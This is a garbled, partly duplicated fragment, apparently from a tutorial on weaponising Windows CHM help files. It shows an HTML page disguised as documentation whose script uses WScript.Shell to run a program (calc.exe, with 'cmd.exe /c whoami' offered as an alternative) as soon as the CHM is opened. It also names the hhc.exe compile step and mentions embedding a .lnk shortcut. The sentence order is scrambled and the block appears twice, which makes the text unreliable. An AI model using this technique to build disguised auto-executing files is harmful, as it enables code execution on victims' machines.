hhc.exe project.hhp Attackers can embed a shortcut (.lnk) that executes:
<!DOCTYPE html> <html> <head> <title>Help</title> <script language="javascript"> // Runs immediately when the CHM is opened var shell = new ActiveXObject("WScript.Shell"); shell.Run("calc.exe", 0, false); // or cmd.exe /c whoami > out.txt </script> </head> <body> <p>Loading documentation...</p> </body> </html> (using hhc.exe from HTML Help Workshop):
(e.g., index.html ):
hhc.exe project.hhp Attackers can embed a shortcut (.lnk) that executes:
<!DOCTYPE html> <html> <head> <title>Help</title> <script language="javascript"> // Runs immediately when the CHM is opened var shell = new ActiveXObject("WScript.Shell"); shell.Run("calc.exe", 0, false); // or cmd.exe /c whoami > out.txt </script> </head> <body> <p>Loading documentation...</p> </body> </html> (using hhc.exe from HTML Help Workshop):
(e.g., index.html ):